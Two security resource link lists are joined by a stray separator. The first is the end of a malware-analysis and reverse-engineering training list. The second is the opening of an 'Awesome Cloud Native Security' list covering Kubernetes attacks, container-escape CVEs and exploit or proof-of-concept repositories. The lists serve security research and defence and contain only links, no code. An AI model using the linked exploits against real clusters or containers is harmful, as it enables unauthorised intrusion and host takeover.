* AlienVault OTX - https://otx.alienvault.com/
* C2 Tracker - http://tracker.viriback.com/stats.php
* MISP - https://www.misp-project.org/
* The Hive - https://thehive-project.org/
* Yeti - https://yeti-platform.github.io/
* Using ATT&CK for CTI Training - https://attack.mitre.org/resources/training/cti/
* PasteScraper - https://github.com/PimmyTrousers/pastescraper
# Training:
* Cybrary - https://www.cybrary.it/
* Corelan Team - https://www.corelan.be/
* Open Security Training - http://opensecuritytraining.info/Training.html
* Offensive Computer Security - http://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/lectures.html
* PentesterLab - https://pentesterlab.com/
* Malware Traffic Analysis - http://www.malware-traffic-analysis.net/training-exercises.html
* MIT Open Courseware - https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-858-computer-systems-security-fall-2014/video-lectures/
* OALabs - https://vimeo.com/oalabs
* OALabs - https://www.youtube.com/channel/UC--DwaiMV-jtO-6EvmKOnqg/videos
* MalwareAnalysisForHedgeHogs - https://www.youtube.com/channel/UCVFXrUwuWxNlm6UNZtBLJ-A
* Malware Unicorn - https://securedorg.github.io/
* Tuts4You - https://tuts4you.com/
* Lenas Reversing for Newbies - https://tuts4you.com/download.php?list.17
* Introduction to WinDBG - https://www.youtube.com/watch?list=PLhx7-txsG6t6n_E2LgDGqgvJtCHPL7UFu&time_continue=1&v=8zBpqc3HkSE
* Colin Hardy - https://www.youtube.com/channel/UCND1KVdVt8A580SjdaS4cZg/videos
* OWASP AppSec Tutorials - http://owasp-academy.teachable.com/p/owasp-appsec-tutorials
* Modern Binary Exploitation - https://github.com/RPISEC/MBE
* FuzzySecurity - http://www.fuzzysecurity.com/tutorials.html
* Linux Journey - https://linuxjourney.com/
* Pivot Project - http://pivotproject.org/
* Security Tube - http://www.securitytube-training.com/index.html
* Packet Life Cheat Sheets - http://packetlife.net/library/cheat-sheets/?_escaped_fragment_=#!
* SecurityXploded - http://securityxploded.com/
* MalwareMustDie - https://www.youtube.com/playlist?list=PLSe6fLFf1YDX-2sog70220BchQmhVqQ75
* Win32Assembly - http://win32assembly.programminghorizon.com/tutorials.html
* RPISEC - https://github.com/RPISEC/Malware/blob/master/README.md
* RPISEC - https://github.com/RPISEC/MBE
* Reverse Engineering Challenges - https://challenges.re/
* HackerOne - https://www.hackerone.com/
* Google Python Class - https://developers.google.com/edu/python/
* Guide to x86 Assembly - http://www.cs.virginia.edu/~evans/cs216/guides/x86.html
* Code Blocks - http://www.codeblocks.org/
* Wireshark Course - https://www.youtube.com/watch?v=XTSc2mPF4II&t=25s
* Maltrak Malware Analyst webinar - http://maltrak.com/webinar-registration
* Intro to ARM assembly basics - https://azeria-labs.com/writing-arm-assembly-part-1/
* Life in Hex - https://lifeinhex.com/category/reversing/
* The Cuckoo's Egg Decompiled Online Course - http://chrissanders.org/cuckoosegg/
* Creating Yara Rules for Malware Detection - https://www.real0day.com/hacking-tutorials/yara
* Windows Privilege Escalation Guide - https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
* Amr Thabet shellcode training - https://www.youtube.com/channel/UCkY_8Hz8ojyQQ9S6bPnHa7g
* Hexacorn Converting Shellcode to Portable Executable (32- and 64- bit) - http://www.hexacorn.com/blog/2015/12/10/converting-shellcode-to-portable-executable-32-and-64-bit/
* Learn Forensics with David Cowen - https://www.youtube.com/user/LearnForensics/featured
* Raphael Mudge (various, In-memory evasion/detection) - https://www.youtube.com/user/DashnineMedia/videos
* Assembly programming tutorial - https://www.tutorialspoint.com/assembly_programming/index.htm
* RPISec Training - https://github.com/RPISEC/Malware
* Intro to Computer Science - https://www.edx.org/course/introduction-to-computer-science-and-programming-7
* Ringzer0 - https://www.ringzer0.training/
* Reversing Hero - https://www.reversinghero.com/
* MIT Open Courseware - https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-00-introduction-to-computer-science-and-programming-fall-2008/video-lectures/
* Reverse Engineering and malware analysis 101 - https://github.com/abhisek/reverse-engineering-and-malware-analysis
* Reverse engineering intel x64 - https://github.com/0xdidu/Reverse-Engineering-Intel-x64-101
* C++ Tutorial for Beginners - Full Course - https://www.youtube.com/watch?v=vLnPwxZdW4Y
* ELF Reversing Tutorial - https://www.youtube.com/playlist?list=PLsNNY-Xea3ra42GZDnvTB46G4p-5oUpFf
* Adversary Tactics: PowerShell - https://github.com/specterops/at-ps
* Malware Unicorn Reverse Engineering 101 - https://malwareunicorn.org/workshops/re101.html#0
* Modern Binary Exploitation - http://security.cs.rpi.edu/courses/binexp-spring2015/
* Ghidra Courses - https://ghidra.re/online-courses/
* Technical Writing Courses - https://developers.google.com/tech-writing
* Introduction to Malware Analysis and Reverse Engineering - https://class.malware.re/
* Binary Analysis Course - https://maxkersten.nl/binary-analysis-course/
* Josh Stroschein - https://www.youtube.com/user/jstrosch/videos
* How to hack together your own CS degree online for free - https://www.freecodecamp.org/news/how-to-hack-your-own-cs-degree-for-free/
* Zero 2 Automated - https://courses.zero2auto.com/adv-malware-analysis-course
# Unpacking:
* UnpacMe - https://www.unpac.me/#/
* Unipacker - https://github.com/unipacker/unipacker
# VBA Deobfuscation Tools:
* pcodedmp - https://github.com/bontchev/pcodedmp
* vba-dynamic-hook - https://github.com/eset/vba-dynamic-hook
* ViperMonkey - https://github.com/decalage2/ViperMonkey
# Video:
* Teach Yourself Computer Science - https://teachyourselfcs.com/
* CS50 at Harvard - https://cs50.harvard.edu/
* J4vv4D - https://www.j4vv4d.com/videos/
* Movies for Hackers - https://github.com/k4m4/movies-for-hackers
* Can You Hack It - https://www.youtube.com/watch?v=GWr5kbHt_2E
* Chris Nickerson talk - http://www.irongeek.com/i.php?page=videos/derbycon5/teach-me14-started-from-the-bottom-now-im-here-how-to-ruin-your-life-by-getting-everything-you-ever-wanted-chris-nickerson
* Zoz - Don't Fuck it Up - https://www.youtube.com/watch?v=J1q4Ir2J8P8
* Rob Joyce (NSA) - Disrupting Nation State Hackers - https://www.youtube.com/watch?v=bDJb8WOJYdA
* Movies for Hackers - https://github.com/k4m4/movies-for-hackers
* Wannacry: The Marcus Hutchins Story - All 3 Chapters - https://www.youtube.com/watch?v=vveLaA-z3-o&t=451s
* DEF CON 23 - Chris Domas - Repsych: Psychological Warfare in Reverse Engineering - https://www.youtube.com/watch?v=HlUe0TUHOIc
* SAS2018: Finding aliens, star weapons and ponies with YARA - https://www.youtube.com/watch?v=fbidgtOXvc0
# XOR Decoding Tools:
* bbcrack - https://www.decalage.info/python/balbuzard
* Brutexor - https://www.aldeid.com/wiki/Brutexor-iheartxor
* ConverterNET - http://www.kahusecurity.com/2017/converternet-v0-1-released/
* NoMoreXOR - https://github.com/hiddenillusion/NoMoreXOR
# Yara Related:
* Yara - https://virustotal.github.io/yara/
* Stringless Yara Rules - https://inquest.net/blog/2018/09/30/yara-performance
* YarGen - https://github.com/Neo23x0/yarGen
* Yara-Rules - https://github.com/Yara-Rules/rules
* CONFidence 2019: "Utilizing YARA to Find Evolving Malware" - Jay Rosenberg - https://www.youtube.com/watch?v=XMZ-c2Zwzjg
* SANS Webcast - YARA - Effectively using and generating rules - https://www.youtube.com/watch?v=5A_O8X_JljI
* Klara - https://github.com/KasperskyLab/klara
* Open Source Yara Rules - https://github.com/mikesxrs/Open-Source-YARA-rules
|
# Awesome Cloud Native Security 🐿
![](images/banner.png)
This repository is used to collect **AWESOME** resources on the topic of cloud native security found during research.
Note:
- All resources will be suffixed and ordered by date of conferences, blogs or other formats of publication, if applicable.
- Resources in sub-list are related to their parent entries.
- For simplicity, resources would **NOT** be duplicated in two or more topics. For example, some resources about Escape of Windows Server Containers are within topic *[Windows Containers](https://github.com/brant-ruan/awesome-cloud-native-security#18-windows-containers)*.
- Contributions are welcome & appreciated :)
## 0 General
- [OWASP Cloud-Native Application Security Top 10](https://owasp.org/www-project-cloud-native-application-security-top-10/)
- [Hacking and Hardening Kubernetes Clusters by Example (KubeCon 2017)](https://github.com/sbueringer/kubecon-slides/blob/master/slides/2017-kubecon-na/Hacking%20and%20Hardening%20Kubernetes%20Clusters%20by%20Example%20%5BI%5D%20-%20Brad%20Geesaman%2C%20Symantec%20-%20Hacking%20and%20Hardening%20Kubernetes%20By%20Example%20v2.pdf)
- [2018绿盟科技容器安全技术报告 (2018-11)](https://www.nsfocus.com.cn/upload/contents/2018/11/20181109100414_79051.pdf)
- [2020绿盟科技云原生安全技术报告 (2021-01)](http://blog.nsfocus.net/wp-content/uploads/2021/01/Technical-Report-of-Cloud-Native-Security.pdf)
- [A Measurement Study on Linux Container Security: Attacks and Countermeasures (ACSAC 2018)](https://csis.gmu.edu/ksun/publications/container-acsac18.pdf)
- [Kubernetes Security: Operating Kubernetes Clusters and Applications Safely (Book, 2018-09-28)](https://book4you.org/book/11026038/453528)
- [Container Security: Fundamental Technology Concepts that Protect Containerized Applications (Book, 2020-04-01)](https://sg1lib.org/book/5534739/4f0c10)
- [MITRE ATT&CK framework for container runtime security with Falco. (2019-05-10)](https://sysdig.com/blog/mitre-attck-framework-for-container-runtime-security-with-sysdig-falco/)
- [Threat matrix for Kubernetes (Microsoft, 2020-04-02)](https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/)
- [Microsoft's Kubernetes Threat Matrix: Here's What's Missing (2020-10-26)](https://www.darkreading.com/threat-intelligence/microsoft-s-kubernetes-threat-matrix-here-s-what-s-missing)
- [Secure containerized environments with updated threat matrix for Kubernetes (2021-03-23)](https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/)
- [国内首个云上容器ATT&CK攻防矩阵发布,阿里云助力企业容器化安全落地 (2020-06-18)](https://developer.aliyun.com/article/765449)
- [MITRE ATT&CK Containers Matrix (2021-04-29)](https://attack.mitre.org/matrices/enterprise/containers/)
- [最佳实践:发布国内首个K8S ATT&CK攻防矩阵 (青藤, 2021-08-25)](https://mp.weixin.qq.com/s/-FTJRl1ZK2Etgq7KO17r7w)
- [2021西部云安全峰会召开:“云安全优才计划”发布,腾讯云安全攻防矩阵亮相 (2021-09-26)](https://mp.weixin.qq.com/s/IBTE_s-8ZO8Ac3m040-eTA)
- [云原生安全:基于容器ATT&CK矩阵模拟攻防对抗的思考 (2021-11-01)](https://www.freebuf.com/articles/security-management/303010.html)
- [Containers' Security: Issues, Challenges, and Road Ahead (IEEE Access 2019)](https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=8693491)
- [企业应用容器化的攻与防 (JINQI-CON 2019)](https://github.com/neargle/slidefiles/blob/main/2019%20jingqicon%20-%20Red%20vs%20Blue%20for%20containerized%20application.pdf)
- [Sysdig 2021 Container Security and Usage Report (2021-01-01)](https://sysdig.com/wp-content/uploads/2021-container-security-and-usage-report.pdf)
- [CNCF Cloud Native Security Whitepaper (2021-02-17)](https://github.com/cncf/tag-security/blob/017e77ff380e303d80adb78e60a1f262e80df0e8/security-whitepaper/cloud-native-security-whitepaper.md)
- [Metarget:云原生攻防靶场开源啦! (2021-05-10)](https://mp.weixin.qq.com/s?__biz=MzIyODYzNTU2OA==&mid=2247489415&idx=1&sn=4aea7b7ecff51710c79037ab07a889bc)
- [컨테이너에서 버그 찾기 어디까지 해봤니 (How to Find Container Platform Bug, CodeEngn 2021)](https://github.com/codeengn/codeengn-conference/blob/master/17/2021%20CodeEngn%20Conference%2017%2C%20컨테이너에서%20버그%20찾기%20어디까지%20해봤니%20%5B김우석%5D.pdf)
- [Kubernetes Hardening Guidance (by NSA & CISA, 2021-08-03)](https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF)
- [Kubernetes Security Checklist and Requirements](https://github.com/Vinum-Security/kubernetes-security-checklist)
- [《云原生安全:攻防实践与体系构建》](https://github.com/brant-ruan/cloud-native-security-book)
- [Security Challenges in the Container Cloud (IEEE TPS-ISA 2021)](https://github.com/brant-ruan/slides-and-papers/blob/master/TPS21.pdf)
## 1 Offensive
### 1.1 General
- [Container Security: Examining Potential Threats to the Container Environment (2019-05-14)](https://www.trendmicro.com/vinfo/us/security/news/security-technology/container-security-examining-potential-threats-to-the-container-environment)
- [云原生环境渗透工具考察 (2020-06-22)](https://wohin.me/yun-yuan-sheng-huan-jing-shen-tou-xiang-guan-gong-ju-kao-cha/)
- [红蓝对抗中的云原生漏洞挖掘及利用实录 (2021-03-02)](https://mp.weixin.qq.com/s/Aq8RrH34PTkmF8lKzdY38g)
- [靶机实验:综合场景下的渗透实战](https://github.com/brant-ruan/cloud-native-security-book/blob/main/appendix/靶机实验:综合场景下的渗透实战.pdf)
- [Exploit Symlink for Fun and Profit: from Native to Cloud Native (2021-12-08)](https://github.com/brant-ruan/slides-and-papers/blob/master/TechWorld创新沙龙-202112-symlink.pdf)
### 1.2 Kubernetes
#### 1.2.1 General
- [Walls Within Walls: What if your attacker knows parkour? (KubeCon 2019)](https://kccncna19.sched.com/event/UaeM/walls-within-walls-what-if-your-attacker-knows-parkour-tim-allclair-greg-castle-google)
- [Walls Within Walls: What if Your Attacker Knows Parkour? (Video)](https://www.youtube.com/watch?v=6rMGRvcjvKc)
- [k0otkit:针对K8s集群的通用后渗透控制技术 (CIS 2020)](https://github.com/brant-ruan/k0otkit/blob/main/CIS2020-slide.pdf)
- [k0otkit: Hack K8s in a K8s Way (Paper)](https://wohin.me/k0otkit-hack-k8s-in-a-k8s-way/)
- [k0otkit: Hack K8s in a K8s Way (Video)](https://cis.freebuf.com/?id=65)
- [Github Repo for k0otkit](https://github.com/brant-ruan/k0otkit)
- [Advanced Persistence Threats: The Future of Kubernetes Attacks (RSA 2020)](https://published-prd.lanyonevents.com/published/rsaus20/sessionsFiles/18317/2020_USA20_CSV-F01_01_Advanced%20Persistence%20Threats%20The%20Future%20of%20Kubernetes%20Attacks.pdf)
- [Advanced Persistence Threats: The Future of Kubernetes Attacks (Video)](https://www.youtube.com/watch?v=CH7S5rE3j8w)
- [Compromising Kubernetes Cluster by Exploiting RBAC Permissions (RSA 2020)](https://published-prd.lanyonevents.com/published/rsaus20/sessionsFiles/18100/2020_USA20_DSO-W01_01_Compromising%20Kubernetes%20Cluster%20by%20Exploiting%20RBAC%20Permissions.pdf)
- [Compromising Kubernetes Cluster by Exploiting RBAC Permissions (Video)](https://www.youtube.com/watch?v=1LMo0CftVC4)
- [Command and KubeCTL: Real-world Kubernetes Security for Pentesters (Shmoocon 2020)](https://docs.google.com/presentation/d/1y6KGGT5Uw27cCgFMKiGv0NjRhq8YvjY_S9UG8s_TThg/edit#slide=id.g6d20dd40e5_0_1816)
- [Deep Dive into Real-World Kubernetes Threats (2020-02-12)](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/)
- [Using Kubelet Client to Attack the Kubernetes Cluster (2020-08-19)](https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster)
- [Attacking Kubernetes Clusters Through Your Network Plumbing: Part 1 (2020-11-05)](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1)
- [Attacking Kubernetes Clusters Through Your Network Plumbing: Part 2 (2021-05-17)](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-2)
- [Metadata service MITM allows root privilege escalation (EKS / GKE) (2021-02-28)](https://blog.champtar.fr/Metadata_MITM_root_EKS_GKE/)
- [etcd未授权访问的风险及修复方案详解 (2021-04-09)](https://www.anquanke.com/post/id/236831)
- [New Attacks on Kubernetes via Misconfigured Argo Workflows (2021-07-20)](https://www.intezer.com/blog/container-security/new-attacks-on-kubernetes-via-misconfigured-argo-workflows/)
- [Creating Malicious Admission Controllers (2021-08-09)](https://blog.rewanthtammana.com/creating-malicious-admission-controllers)
- [Don’t let Prometheus Steal your Fire (2021-10-12))](https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/)
- [Attack Cloud Native Kubernetes (HITB 2021)](https://github.com/neargle/slidefiles/blob/main/2021%20HITB%20-%20Attack%20Cloud%20Native%20Kubernetes.pdf)
- [Metasploit in Kubernetes (2021-11-04)](https://github.com/rapid7/metasploit-framework/tree/master/kubernetes)
- [【技术推荐】云原生之Kubernetes安全 (2021-12-18)](https://mp.weixin.qq.com/s?__biz=MzI4NjE2NjgxMQ==&mid=2650258483&idx=1&sn=d05b33fa3112b1c0351dee2fca986ae8&chksm=f3e20647c4958f51a10688de8413ae142793a0f9b7ebdc07c537b5c72cf71c026e1e865de268#rd)
#### 1.2.2 Vulnerabilities and Exploits
- [Understanding about CVE-2017–1002101 on kubernetes (2018-03-19)](https://makocchi.medium.com/kubernetes-cve-2017-1002101-en-5a30bf701a3e)
- [Fixing the Subpath Volume Vulnerability in Kubernetes (2018-04-04)](https://kubernetes.io/blog/2018/04/04/fixing-subpath-volume-vulnerability/)
- [ExP: CVE-2017-1002101 by bgeesaman](https://github.com/bgeesaman/subpath-exploit)
- [CVE-2017-1002101:突破隔离访问宿主机文件系统](https://github.com/brant-ruan/cloud-native-security-book/blob/main/appendix/CVE-2017-1002101:突破隔离访问宿主机文件系统.pdf)
- [逃逸风云再起:从CVE-2017-1002101到CVE-2021-25741 (2021-10-12)](https://mp.weixin.qq.com/s/RqaWvzXZR6sLPzBI8ljoxg)
- [Exploiting path traversal in kubectl cp (CVE-2018-1002100, 2018-05-04)](https://hansmi.ch/articles/2018-04-openshift-s2i-security#poc-kubectl-cp)
- [Disclosing a directory traversal vulnerability in Kubernetes copy – CVE-2019-1002101 (2019-03-28)](https://unit42.paloaltonetworks.com/disclosing-directory-traversal-vulnerability-kubernetes-copy-cve-2019-1002101/)
- [CVE-2019-11246: Clean links handling in cp's tar code (2019-04-30)](https://github.com/kubernetes/kubernetes/pull/76788)
- [CVE-2019-11249: Incomplete fixes for CVE-2019-1002101 and CVE-2019-11246, kubectl cp potential directory traversal (2019-08-05)](https://github.com/kubernetes/kubernetes/issues/80984)
- [CVE-2019-11251: kubectl cp symlink vulnerability (2020-02-03)](https://github.com/kubernetes/kubernetes/issues/87773)
- [The Story of the First Kubernetes Critical CVE (CVE-2018-1002105, 2018-12-04)](https://rancher.com/blog/2018/2018-12-04-k8s-cve/)
- [CVE-2018-1002105(k8s特权提升)原理与利用分析报告 (2018-12-08)](https://xz.aliyun.com/t/3542)
- [CVE-2018-1002103:远程代码执行与虚拟机逃逸](https://github.com/brant-ruan/cloud-native-security-book/blob/main/appendix/CVE-2018-1002103:远程代码执行与虚拟机逃逸.pdf)
- [Kubernetes hostPort allow services traffic interception when using kubeproxy IPVS (CVE-2019-9946, 2019-03-28)](http://blog.champtar.fr/CVE-2019-9946/)
- [Non-Root Containers, Kubernetes CVE-2019-11245 and Why You Should Care, (2019-08-28)](https://unit42.paloaltonetworks.com/non-root-containers-kubernetes-cve-2019-11245-care/)
- [When it’s not only about a Kubernetes CVE... (CVE-2020-8555, 2020-06-03)](https://medium.com/@BreizhZeroDayHunters/when-its-not-only-about-a-kubernetes-cve-8f6b448eafa8)
- [Kubernetes Vulnerability Puts Clusters at Risk of Takeover (CVE-2020-8558, 2020-07-27)](https://unit42.paloaltonetworks.com/cve-2020-8558/)
- [Kubernetes man in the middle using LoadBalancer or ExternalIPs (CVE-2020-8554, 2020-12-08)](https://blog.champtar.fr/K8S_MITM_LoadBalancer_ExternalIPs/)
- [Protecting Against an Unfixed Kubernetes Man-in-the-Middle Vulnerability (CVE-2020-8554, 2020-12-21)](https://unit42.paloaltonetworks.com/cve-2020-8554/)
- [Host MITM attack via IPv6 rogue router advertisements (K8S CVE-2020-10749 / Docker CVE-2020-13401 / LXD / WSL2 / …) (2021-02-28)](https://blog.champtar.fr/IPv6_RA_MITM/)
- [Exploiting and detecting CVE-2021-25735: Kubernetes validating admission webhook bypass (2021-04-28)](https://sysdig.com/blog/cve-2021-25735-kubernetes-admission-bypass/)
- [ExP: CVE-2021-25735 by darryk10](https://github.com/darryk10/CVE-2021-25735)
- [Detecting and Mitigating CVE-2021-25737: EndpointSlice validation enables host network hijack (2021-05-24)](https://sysdig.com/blog/cve-2021-25737-endpointslice/)
- [浅谈云上攻防——CVE-2020-8562漏洞为k8s带来的安全挑战 (2021-10-25)](https://mp.weixin.qq.com/s/HCBL7SND_-IZqeqX_vchug)
### 1.3 Container
#### 1.3.1 General
- [Abusing Privileged and Unprivileged Linux Containers (2016-06-01)](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container_whitepaper.pdf)
- [Bypassing Docker Authz Plugin and Using Docker-Containerd for Privesc (2019-07-11)](https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/)
- [A Methodology for Penetration Testing Docker Systems (Bachelor Theses, 2020-01-17)](https://www.cs.ru.nl/bachelors-theses/2020/Joren_Vrancken___4593847___A_Methodology_for_Penetration_Testing_Docker_Systems.pdf)
- [针对容器的渗透测试方法 (2020-04-17)](https://mp.weixin.qq.com/s?subscene=19&__biz=MzIyODYzNTU2OA==&mid=2247487590&idx=1&sn=060a8bdf2ddfaff6ceae5cb931cb27ab&chksm=e84fb6b9df383faf1723040a0d6f0300c9517db902ef0010e230d8e802b1dfe9d8b95e6aabbd)
- [里应外合:借容器root提权 (2020-12-03)](https://wohin.me/li-ying-wai-he-jie-zhu-rong-qi-root/)
- [CVE-2021-21287: 容器与云的碰撞——一次对MinIO的测试 (2021-01-30)](https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html)
- [New Vulnerability Affecting Container Engines CRI-O and Podman (CVE-2021-20291) (2021-04-14)](https://unit42.paloaltonetworks.com/cve-2021-20291/)
#### 1.3.2 Container Escape
- [Container escape through open_by_handle_at (shocker exploit) (2014-06-18)](https://lists.linuxcontainers.org/pipermail/lxc-users/2014-June/007248.html)
- [Docker breakout exploit analysis (2014-06-19)](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3)
- [PoC: Shocker by gabrtv](https://github.com/gabrtv/shocker)
- [Docker 容器逃逸案例分析 (2016-07-19)](https://developer.aliyun.com/article/57803)
- [Dirty COW - (CVE-2016-5195) - Docker Container Escape (2017-09)](https://blog.paranoidsoftware.com/dirty-cow-cve-2016-5195-docker-container-escape/)
- [ExP: CVE-2016-5195 by scumjr](https://github.com/scumjr/dirtycow-vdso)
- [Escaping Docker container using waitid() – CVE-2017-5123 (2017-12-27)](https://web.archive.org/web/20180626023815/https://www.twistlock.com/2017/12/27/escaping-docker-container-using-waitid-cve-2017-5123/)
- [Escaping Docker container using waitid() - CVE-2017-5123 (Video)](https://www.youtube.com/watch?v=IdRDFS4u2rQ)
- [A Compendium of Container Escapes (Black Hat 2019)](https://capsule8.com/assets/ug/us-19-Edwards-Compendium-Of-Container-Escapes.pdf)
- [In-and-out - Security of Copying to and from Live Containers (Open Source Summit 2019)](https://osseu19.sched.com/event/TLC4/in-and-out-security-of-copying-to-and-from-live-containers-ariel-zelivansky-yuval-avrahami-twistlock)
- [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host (2019-02-13)](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html)
- [ExP: CVE-2019-5736 by Frichetten](https://github.com/Frichetten/CVE-2019-5736-PoC)
- [Escaping a Broken Container - 'namespaces' from 35C3 CTF (2019-04-15)](http://blog.perfect.blue/namespaces-35c3ctf)
- [容器逃逸成真:从CTF到CVE-2019-5736 (2019-11-20)](https://wohin.me/rong-qi-tao-yi-cheng-zhen-cong-ctfjie-ti-dao-cve-2019-5736lou-dong-wa-jue-fen-xi/)
- [An Exercise in Practical Container Escapology (2019-03-07)](https://capsule8.com/blog/practical-container-escape-exercise/)
- [Felix Wilhelm's Twitter on the Escape Technique utilizing release_agent (2019-07-17)](https://twitter.com/_fel1x/status/1151487051986087936?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1151487053370187776%7Ctwgr%5E%7Ctwcon%5Es2_&ref_url=https%3A%2F%2Fajxchapman.github.io%2Fcontainers%2F2020%2F11%2F19%2Fprivileged-container-escape.html)
- [Understanding Docker container escapes (2019-07-19)](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)
- [Privileged Container Escape - Control Groups release_agent (2020-11-19)](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html)
- [Kubernetes Pod Escape Using Log Mounts (2019-08-01)](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts)
- [Kubelet follows symlinks as root in /var/log from the /logs server endpoint (debate on hackerone, 2021-04-02)](https://hackerone.com/reports/1036886)
- [PoC: kube-pod-escape](https://github.com/danielsagi/kube-pod-escape)
- [Original Tweet on CVE-2019-16884 (2019-09-22)](https://twitter.com/adam_iwaniuk/status/1175741830136291328)
- [CVE-2019-19921: Volume mount race condition with shared mounts (2020-01-01)](https://github.com/opencontainers/runc/issues/2197)
- [PoC: runc-masked-race.sh](https://gist.github.com/leoluk/82965ad9df58247202aa0e1878439092)
- [PATCH RFC 1/1 mount: universally disallow mounting over symlinks (2019-12-30)](https://lore.kernel.org/stable/[email protected]/)
- [容器逃逸技术概览 (2020-02-21)](https://wohin.me/rong-qi-tao-yi-gong-fang-xi-lie-yi-tao-yi-ji-zhu-gai-lan/)
- [Escaping Virtualized Containers (Black Hat 2020)](https://i.blackhat.com/USA-20/Thursday/us-20-Avrahami-Escaping-Virtualized-Containers.pdf)
- [Kata Containers逃逸研究 (2020-09-25)](https://mp.weixin.qq.com/s/q4xJtlO6iFpHQginGvVBDQ)
- [Security advisory for four vulnerabilities in Kata Containers (2020-12-04)](https://bugs.launchpad.net/katacontainers.io/+bug/1863875)
- [CVE-2020-14386: Privilege Escalation Vulnerability in the Linux kernel (2020-10-09)](https://unit42.paloaltonetworks.com/cve-2020-14386/)
- [Containing a Real Vulnerability (2020-09-18)](https://gvisor.dev/blog/2020/09/18/containing-a-real-vulnerability/)
- [host模式容器逃逸漏洞(CVE-2020-15257)技术分析 (2020-12-02)](https://mp.weixin.qq.com/s/WmSaLPnG4o4Co1xRiYCOnQ)
- [ABSTRACT SHIMMER (CVE-2020-15257): Host Networking is root-Equivalent, Again (2020-12-10)](https://research.nccgroup.com/2020/12/10/abstract-shimmer-cve-2020-15257-host-networking-is-root-equivalent-again/)
- [容器逃逸CVE-2020-15257 containerd-shim Exploit开发 (2020-12-14)](https://www.cdxy.me/?p=837)
- [The Strange Case of How We Escaped the Docker Default Container (CVE-2020-27352, 2021-03-04)](https://www.cyberark.com/resources/threat-research-blog/the-strange-case-of-how-we-escaped-the-docker-default-container)
- [runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465, 2021-05-30)](http://blog.champtar.fr/runc-symlink-CVE-2021-30465/)
- [RunC TOCTOU逃逸CVE-2021-30465分析 (2021-08-18)](https://zhuanlan.zhihu.com/p/401057262)
- [利用Linux内核漏洞实现Docker逃逸 (2021-06-11)](https://mp.weixin.qq.com/s/ea8YLaXjSjKcN4MNgMi2aQ)
- [【安全干货】Docker CVE-2018-6552 (2021-06-30)](https://mp.weixin.qq.com/s?__biz=Mzg5NjEyMjA5OQ==&mid=2247486707&idx=1&sn=0cd7dea2347f19beb703088947932b4f)
- [CVE-2021-22555: Turning \x00\x00 into 10000$ (2021-07-07)](https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html)
- [CVE-2021-22555:Linux 内核提权导致 Docker 逃逸 (2021-07-23)](https://mp.weixin.qq.com/s?__biz=MzI1NDQxMDE0NQ==&mid=2247484015&idx=1&sn=74755a7113cd13655239d885c34562f0)
- [With Friends like eBPF, who needs enemies? (Defcon 29)](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-With-Friends-Like-EBPF-Who-Needs-Enemies.pdf)
- [Container Escape in 2021 (HITB 2021)](https://conference.hitb.org/hitbsecconf2021sin/materials/D2T2%20-%20Ccntainer%20Escape%20in%202021%20-%20Li%20Qiang.pdf)
- [Container Escape in 2021 (KCon 2021)](https://github.com/knownsec/KCon/blob/master/2021/Container%20escape%20in%202021.pdf)
- [Finding Azurescape – Cross-Account Container Takeover in Azure Container Instances (2021-09-09)](https://unit42.paloaltonetworks.com/azure-container-instances/)
- [云原生安全攻防|使用eBPF逃逸容器技术分析与实践 (2021-11-03)](https://mp.weixin.qq.com/s/Psqy3X3VdUPga7f2cnct1g)
- [Overflow in netlink bytemsg length field allows attacker to override netlink-based container configuration (CVE-2021-43784, 2021-12-06)](https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f)
- [Issue 2241: runc/libcontainer: insecure handling of bind mount sources](https://bugs.chromium.org/p/project-zero/issues/detail?id=2241)
#### 1.3.3 Container DoS
- [Houdini’s Escape: Breaking the Resource Rein of Linux Control Groups (CCS 2019)](http://www.cs.memphis.edu/~xgao1/paper/ccs19.pdf)
- [Houdini’s Escape: Breaking the Resource Rein of Linux Control Groups (Video)](https://www.youtube.com/watch?v=PPo9sQnJaec)
- [Docker组件间标准输入输出复制的DoS攻击分析 (网络信息安全学报 2020)](http://www.infocomm-journal.com/cjnis/CN/10.11959/j.issn.2096-109x.2020074)
- [Demons in the Shared Kernel: Abstract Resource Attacks Against OS-level Virtualization (CCS 2021)](https://wenboshen.org/assets/papers/LogicalDoS.pdf)
### 1.4 Serverless
- [Hacking Serverless Runtimes (Black Hat 2017)](https://www.blackhat.com/docs/us-17/wednesday/us-17-Krug-Hacking-Severless-Runtimes.pdf)
- [Hacking Serverless Runtimes (Whitepaper)](https://www.blackhat.com/docs/us-17/wednesday/us-17-Krug-Hacking-Severless-Runtimes-wp.pdf)
- [Serverless Toolkit for Pentesters (2018-11-11)](https://blog.ropnop.com/serverless-toolkit-for-pentesters/)
